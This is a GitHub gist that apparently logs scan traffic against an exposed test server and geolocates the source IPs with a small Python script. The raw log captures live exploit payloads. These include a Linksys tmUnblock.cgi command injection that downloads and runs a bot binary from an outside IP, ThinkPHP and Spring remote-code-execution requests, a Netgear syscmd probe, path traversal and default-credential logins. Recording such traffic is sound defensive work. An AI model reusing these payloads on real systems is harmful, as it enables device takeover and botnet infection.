Skip to content

Instantly share code, notes, and snippets.

@gmemstr

gmemstr/geolocate.py

Last active September 12, 2019 09:43
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save gmemstr/82005630aa45680231e9d596fe5098c9 to your computer and use it in GitHub Desktop.
Save gmemstr/82005630aa45680231e9d596fe5098c9 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
geolocate.py
#!/usr/bin/python3
#
# Print geolocation of IP collection file ips.txt file.
import requests
import json
api_key = ""
base_url = "http://api.ipstack.com/"
results = dict()
f = open("ips.txt", "r")
f1 = f.readlines()
for x in f1:
ip = x.rstrip();
if ip in results:
print(ip + " - " + results[ip] + " [DUPE]")
continue
resp = requests.get(url=base_url + ip + "?access_key=" + api_key)
data = json.loads(resp.text)
print(ip + " - " + data["country_name"])
results[ip] = data["country_name"]
Raw
ips-countries.txt
77.159.81.103 - France
5.202.80.16 - Iran
92.63.194.3 - Russia
92.63.194.3 - Russia [DUPE]
213.79.119.226 - Russia
77.48.60.45 - Czechia
106.75.85.37 - China
106.75.85.117 - China
117.50.63.227 - China
216.218.206.67 - United States
14.186.44.242 - Vietnam
14.186.44.242 - Vietnam [DUPE]
77.42.105.196 - Iran
154.223.34.116 - Hong Kong SAR China
151.73.179.172 - Italy
151.73.179.172 - Italy [DUPE]
103.21.141.44 - China
103.21.141.44 - China [DUPE]
103.21.141.44 - China [DUPE]
103.21.141.44 - China [DUPE]
103.21.141.44 - China [DUPE]
5.202.212.196 - Iran
103.73.182.207 - India
197.255.219.18 - Nigeria
46.28.124.97 - Italy
94.241.128.94 - Iran
201.76.120.222 - Brazil
139.162.111.98 - Japan
94.66.37.178 - Greece
94.66.37.178 - Greece [DUPE]
94.66.37.178 - Greece [DUPE]
94.66.37.178 - Greece [DUPE]
94.66.37.178 - Greece [DUPE]
94.66.37.178 - Greece [DUPE]
94.66.37.178 - Greece [DUPE]
94.66.37.178 - Greece [DUPE]
151.243.13.122 - Iran
92.119.160.78 - Russia
186.233.178.85 - Brazil
77.247.108.162 - Germany
77.247.108.162 - Germany [DUPE]
163.172.111.59 - France
163.172.111.59 - France [DUPE]
92.119.160.10 - Russia
83.143.86.62 - Norway
83.143.86.62 - Norway [DUPE]
80.30.227.210 - Spain
177.68.196.237 - Brazil
103.233.123.196 - India
184.105.139.70 - United States
23.225.121.171 - United States
23.225.121.171 - United States [DUPE]
82.55.112.168 - Italy
36.91.171.37 - Indonesia
109.74.50.98 - Hungary
191.97.32.4 - Argentina
42.201.253.130 - Pakistan
120.204.202.112 - China
120.204.202.112 - China [DUPE]
120.204.202.112 - China [DUPE]
120.204.202.112 - China [DUPE]
120.204.202.112 - China [DUPE]
50.209.104.212 - United States
91.108.156.233 - Iran
66.240.205.34 - United States
66.240.205.34 - United States [DUPE]
66.240.205.34 - United States [DUPE]
66.240.205.34 - United States [DUPE]
66.240.205.34 - United States [DUPE]
202.84.77.238 - Cambodia
122.228.19.79 - China
194.61.24.189 - Netherlands
194.61.24.189 - Netherlands [DUPE]
139.162.79.87 - Japan
184.105.139.68 - United States
86.58.116.43 - Slovenia
178.93.18.164 - Ukraine
103.47.219.149 - India
92.39.54.176 - Moldova
101.132.148.50 - China
101.132.148.50 - China [DUPE]
191.205.92.242 - Brazil
92.119.160.10 - Russia [DUPE]
113.173.230.35 - Vietnam
113.173.230.35 - Vietnam [DUPE]
139.162.111.98 - Japan [DUPE]
Raw
ips.txt
77.159.81.103
5.202.80.16
92.63.194.3
92.63.194.3
213.79.119.226
77.48.60.45
106.75.85.37
106.75.85.117
117.50.63.227
216.218.206.67
14.186.44.242
14.186.44.242
77.42.105.196
154.223.34.116
151.73.179.172
151.73.179.172
103.21.141.44
103.21.141.44
103.21.141.44
103.21.141.44
103.21.141.44
5.202.212.196
103.73.182.207
197.255.219.18
46.28.124.97
94.241.128.94
201.76.120.222
139.162.111.98
94.66.37.178
94.66.37.178
94.66.37.178
94.66.37.178
94.66.37.178
94.66.37.178
94.66.37.178
94.66.37.178
151.243.13.122
92.119.160.78
186.233.178.85
77.247.108.162
77.247.108.162
163.172.111.59
163.172.111.59
92.119.160.10
83.143.86.62
83.143.86.62
80.30.227.210
177.68.196.237
103.233.123.196
184.105.139.70
23.225.121.171
23.225.121.171
82.55.112.168
36.91.171.37
109.74.50.98
191.97.32.4
42.201.253.130
120.204.202.112
120.204.202.112
120.204.202.112
120.204.202.112
120.204.202.112
50.209.104.212
91.108.156.233
66.240.205.34
66.240.205.34
66.240.205.34
66.240.205.34
66.240.205.34
202.84.77.238
122.228.19.79
194.61.24.189
194.61.24.189
139.162.79.87
184.105.139.68
86.58.116.43
178.93.18.164
103.47.219.149
92.39.54.176
101.132.148.50
101.132.148.50
191.205.92.242
92.119.160.10
113.173.230.35
113.173.230.35
139.162.111.98
Raw
log.txt
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Content-Length: 0
77.159.81.103 - - [10/Sep/2019 12:50:21] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /global-protect/login.esp
Headers:
Host: 157.245.46.181
X-Real-IP: 169.197.108.22
X-Forwarded-For: 169.197.108.22
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Accept: */*
Accept-Encoding: gzip
127.0.0.1 - - [10/Sep/2019 13:08:56] "GET /global-protect/login.esp HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Content-Length: 0
5.202.80.16 - - [10/Sep/2019 13:47:03] "GET / HTTP/1.1" 200 -
92.63.194.3 - - [10/Sep/2019 14:34:18] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
92.63.194.3 - - [10/Sep/2019 14:34:18] "/*àCookie: mstshash=Administr" 400 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Content-Length: 0
213.79.119.226 - - [10/Sep/2019 14:44:37] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Content-Length: 0
77.48.60.45 - - [10/Sep/2019 14:48:37] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
Accept: */*
106.75.85.37 - - [10/Sep/2019 15:31:03] "GET / HTTP/1.0" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Accept-Language: zh-CN,zh;q=0.8
Connection: close
106.75.85.117 - - [10/Sep/2019 15:31:04] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
Accept: */*
117.50.7.159 - - [10/Sep/2019 15:31:10] "GET / HTTP/1.0" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
Accept: */*
117.50.63.227 - - [10/Sep/2019 15:31:35] "GET / HTTP/1.0" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181
216.218.206.67 - - [10/Sep/2019 15:37:52] "GET / HTTP/1.1" 200 -
----------------------------------------
Exception happened during processing of request from ('220.98.235.154', 56231)
Traceback (most recent call last):
File "/usr/lib/python3.6/socketserver.py", line 320, in _handle_request_noblock
self.process_request(request, client_address)
File "/usr/lib/python3.6/socketserver.py", line 351, in process_request
self.finish_request(request, client_address)
File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/usr/lib/python3.6/http/server.py", line 418, in handle
self.handle_one_request()
File "/usr/lib/python3.6/http/server.py", line 406, in handle_one_request
method()
File "./server.py", line 22, in do_POST
content_length = int(self.headers['Content-Length']) # <--- Gets the size of data
TypeError: int() argument must be a string, a bytes-like object or a number, not 'NoneType'
----------------------------------------
14.186.44.242 - - [10/Sep/2019 16:19:53] code 400, message Bad request version ('HTTP')
14.186.44.242 - - [10/Sep/2019 16:19:53] "GET ../../mnt/custom/ProductDefinition HTTP" 400 -
INFO:root:POST request,
Path: /tmUnblock.cgi
Headers:
Host: 192.168.0.14:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.20.0
Content-Length: 227
Content-Type: application/x-www-form-urlencoded
Body:
ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+linksys.cloudbot%3B+wget+http%3A%2F%2F83.166.252.112%2Fbins%2Flinksys.cloudbot%3B+chmod+777+linksys.cloudbot%3B+.%2Flinksys.cloudbot+linksys.cloudbot
%60&action=&ttcp_num=2&ttcp_size=2&submit_bu
77.42.105.196 - - [10/Sep/2019 17:27:30] "POST /tmUnblock.cgi HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
154.223.34.116 - - [10/Sep/2019 17:40:58] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181
X-Real-IP: 154.223.34.116
X-Forwarded-For: 154.223.34.116
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
127.0.0.1 - - [10/Sep/2019 17:40:59] "GET / HTTP/1.1" 200 -
151.73.179.172 - - [10/Sep/2019 17:55:30] code 400, message Bad request version ('HTTP')
151.73.179.172 - - [10/Sep/2019 17:55:30] "GET ../../mnt/custom/ProductDefinition HTTP" 400 -
INFO:root:GET request,
Path: /cgi-bin/config.exp
Headers:
Host: 157.245.46.181
X-Real-IP: 128.14.134.170
X-Forwarded-For: 128.14.134.170
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Accept: */*
Accept-Encoding: gzip
127.0.0.1 - - [10/Sep/2019 18:56:04] "GET /cgi-bin/config.exp HTTP/1.1" 200 -
----------------------------------------
Exception happened during processing of request from ('172.104.242.173', 57009)
Traceback (most recent call last):
File "/usr/lib/python3.6/socketserver.py", line 320, in _handle_request_noblock
self.process_request(request, client_address)
File "/usr/lib/python3.6/socketserver.py", line 351, in process_request
self.finish_request(request, client_address)
File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/usr/lib/python3.6/http/server.py", line 418, in handle
self.handle_one_request()
File "/usr/lib/python3.6/http/server.py", line 386, in handle_one_request
self.raw_requestline = self.rfile.readline(65537)
File "/usr/lib/python3.6/socket.py", line 586, in readinto
return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
INFO:root:GET request,
Path: /TP/public/index.php
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
Connection: close
Accept-Encoding: gzip
103.21.141.44 - - [10/Sep/2019 18:59:46] "GET /TP/public/index.php HTTP/1.1" 200 -
INFO:root:GET request,
Path: /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
Connection: close
Accept-Encoding: gzip
103.21.141.44 - - [10/Sep/2019 18:59:47] "GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1" 200 -
INFO:root:POST request,
Path: /TP/public/index.php?s=captcha
Headers:
Host: 157.245.46.181:8080
User-Agent: Go-http-client/1.1
Content-Length: 84
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Body:
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=uname&ipconfig
103.21.141.44 - - [10/Sep/2019 18:59:48] "POST /TP/public/index.php?s=captcha HTTP/1.1" 200 -
INFO:root:POST request,
Path: /users?page=&size=5
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
Content-Length: 119
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Body:
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/su")]=&password=&repeatedPassword=
103.21.141.44 - - [10/Sep/2019 18:59:49] "POST /users?page=&size=5 HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
Connection: close
Accept-Encoding: gzip
103.21.141.44 - - [10/Sep/2019 18:59:50] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181
X-Real-IP: 128.14.209.154
X-Forwarded-For: 128.14.209.154
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Accept: */*
Accept-Encoding: gzip
127.0.0.1 - - [10/Sep/2019 19:11:11] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181
X-Real-IP: 213.32.122.82
X-Forwarded-For: 213.32.122.82
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
127.0.0.1 - - [10/Sep/2019 19:53:40] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Content-Length: 0
5.202.212.196 - - [10/Sep/2019 21:41:22] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Content-Length: 0
103.73.182.207 - - [10/Sep/2019 23:03:57] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Content-Length: 0
197.255.219.18 - - [10/Sep/2019 23:31:07] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7
Content-Length: 0
46.28.124.97 - - [10/Sep/2019 23:55:07] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /admin-scripts.asp
Headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Host: 157.245.46.181
Authorization: Basic YWRtaW46YWRtaW4=
80.211.6.136 - - [11/Sep/2019 00:05:43] "GET /admin-scripts.asp HTTP/1.1" 200 -
INFO:root:GET request,
Path: /admin-scripts.asp
Headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Host: 157.245.46.181
Authorization: Basic cm9vdDphZG1pbg==
80.211.6.136 - - [11/Sep/2019 00:05:43] "GET /admin-scripts.asp HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Content-Length: 0
94.241.128.94 - - [11/Sep/2019 01:09:25] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Content-Length: 0
201.76.120.222 - - [11/Sep/2019 01:12:51] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181
X-Real-IP: 184.105.139.67
X-Forwarded-For: 184.105.139.67
X-Forwarded-Proto: https
Connection: close
127.0.0.1 - - [11/Sep/2019 01:23:45] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: HTTP Banner Detection (https://security.ipip.net)
Connection: close
139.162.111.98 - - [11/Sep/2019 01:31:57] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181
X-Real-IP: 62.173.147.6
X-Forwarded-For: 62.173.147.6
X-Forwarded-Proto: https
Connection: close
127.0.0.1 - - [11/Sep/2019 02:03:40] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181
X-Real-IP: 62.173.147.6
X-Forwarded-For: 62.173.147.6
X-Forwarded-Proto: https
Connection: close
127.0.0.1 - - [11/Sep/2019 02:03:40] "GET / HTTP/1.1" 200 -
94.66.37.178 - - [11/Sep/2019 02:59:08] code 400, message Bad request version ('HTTP')
94.66.37.178 - - [11/Sep/2019 02:59:08] "GET ../../mnt/custom/ProductDefinition HTTP" 400 -
94.66.37.178 - - [11/Sep/2019 03:09:43] code 400, message Bad request version ('HTTP')
94.66.37.178 - - [11/Sep/2019 03:09:43] "GET ../../mnt/custom/ProductDefinition HTTP" 400 -
94.66.37.178 - - [11/Sep/2019 03:13:42] code 400, message Bad request version ('HTTP')
94.66.37.178 - - [11/Sep/2019 03:13:42] "GET ../../mnt/custom/ProductDefinition HTTP" 400 -
94.66.37.178 - - [11/Sep/2019 03:22:51] code 400, message Bad request version ('HTTP')
94.66.37.178 - - [11/Sep/2019 03:22:51] "GET ../../mnt/custom/ProductDefinition HTTP" 400 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7
Content-Length: 0
151.243.13.122 - - [11/Sep/2019 05:16:33] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
Connection: keep-alive
Accept-Encoding: gzip,deflate
92.119.160.78 - - [11/Sep/2019 05:22:54] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Content-Length: 0
186.233.178.85 - - [11/Sep/2019 05:26:03] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181
X-Real-IP: 138.68.208.193
X-Forwarded-For: 138.68.208.193
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 zgrab/0.x
Accept: */*
Accept-Encoding: gzip
127.0.0.1 - - [11/Sep/2019 05:53:12] "GET / HTTP/1.1" 200 -
77.247.108.162 - - [11/Sep/2019 07:27:25] code 400, message Bad request syntax ('\x16\x03\x01\x00Ò\x01\x00\x00Î\x03\x03d\x15]Få¬$.·ÞÚ\\\x1c¦Zì\x02Ø]\x9f<-Ø@Üü¼Xd\t_\x85\x00\x00bÀ0À,À/
À+\x00\x9f\x00\x9eÀ2À.À1À-\x00¥\x00¡\x00¤\x00\xa0À(À$À\x14À')
77.247.108.162 - - [11/Sep/2019 07:27:25] "ÒÎd]Få¬$.·ÞÚ\¦ZìØ]<-Ø@Üü¼Xd _
bÀ0À,À/À+À2À.À1À-¥¡¤ À(À$ÀÀ" 400 -
163.172.111.59 - - [11/Sep/2019 08:36:19] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00+&à\x00\x00\x00\x00\x00Cookie:')
163.172.111.59 - - [11/Sep/2019 08:36:19] "+&àCookie: mstshash=hello" 400 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181
X-Real-IP: 71.6.232.7
X-Forwarded-For: 71.6.232.7
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
Accept: */*
Accept-Encoding: gzip
127.0.0.1 - - [11/Sep/2019 09:05:35] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
Connection: keep-alive
Accept-Encoding: gzip,deflate
92.119.160.10 - - [11/Sep/2019 09:08:54] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /Lists/admin.php
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 zgrab/0.x
Accept: */*
Accept-Encoding: gzip
83.143.86.62 - - [11/Sep/2019 09:13:23] "GET /Lists/admin.php HTTP/1.1" 200 -
INFO:root:GET request,
Path: /admin.php
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 zgrab/0.x
Accept: */*
Accept-Encoding: gzip
83.143.86.62 - - [11/Sep/2019 09:13:23] "GET /admin.php HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Content-Length: 0
80.30.227.210 - - [11/Sep/2019 09:25:56] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Content-Length: 0
177.68.196.237 - - [11/Sep/2019 09:47:28] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Content-Length: 0
103.233.123.196 - - [11/Sep/2019 10:13:53] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181
184.105.139.70 - - [11/Sep/2019 10:52:51] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Connection: close
Accept: */*
Accept-Language: zh-cn
Referer: http://157.245.46.181:8080/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Host: 157.245.46.181:8080
23.225.121.171 - - [11/Sep/2019 11:09:34] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181
X-Real-IP: 23.225.121.171
X-Forwarded-For: 23.225.121.171
X-Forwarded-Proto: https
Connection: close
Accept: */*
Accept-Language: zh-cn
Referer: https://157.245.46.181/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
127.0.0.1 - - [11/Sep/2019 11:09:34] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Connection: close
Accept: */*
Accept-Language: zh-cn
Referer: http://157.245.46.181:8080/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Host: 157.245.46.181:8080
23.225.121.171 - - [11/Sep/2019 11:09:35] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181
X-Real-IP: 23.225.121.171
X-Forwarded-For: 23.225.121.171
X-Forwarded-Proto: https
Connection: close
Accept: */*
Accept-Language: zh-cn
Referer: https://157.245.46.181/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
127.0.0.1 - - [11/Sep/2019 11:09:36] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/&currentsetting.htm=1
Headers:
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: /
User-Agent: Mozilla/5.0
82.55.112.168 - - [11/Sep/2019 11:28:50] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/&currentsetting.htm=1 HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Content-Length: 0
36.91.171.37 - - [11/Sep/2019 12:12:52] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Content-Length: 0
109.74.50.98 - - [11/Sep/2019 13:25:56] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Content-Length: 0
191.97.32.4 - - [11/Sep/2019 14:48:23] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Content-Length: 0
42.201.253.130 - - [11/Sep/2019 15:03:52] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Content-Length: 0
177.72.2.186 - - [11/Sep/2019 16:26:00] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181
X-Real-IP: 196.52.43.62
X-Forwarded-For: 196.52.43.62
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3602.2 Safari/537.36
127.0.0.1 - - [11/Sep/2019 17:48:39] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /TP/public/index.php
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
Connection: close
Accept-Encoding: gzip
120.204.202.112 - - [11/Sep/2019 18:36:54] "GET /TP/public/index.php HTTP/1.1" 200 -
INFO:root:GET request,
Path: /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
Connection: close
Accept-Encoding: gzip
120.204.202.112 - - [11/Sep/2019 18:36:55] "GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1" 200 -
INFO:root:POST request,
Path: /TP/public/index.php?s=captcha
Headers:
Host: 157.245.46.181:8080
User-Agent: Go-http-client/1.1
Content-Length: 84
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Body:
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=uname&ipconfig
120.204.202.112 - - [11/Sep/2019 18:36:55] "POST /TP/public/index.php?s=captcha HTTP/1.1" 200 -
INFO:root:POST request,
Path: /users?page=&size=5
Headers:
Host: 157.245.46.181:8080
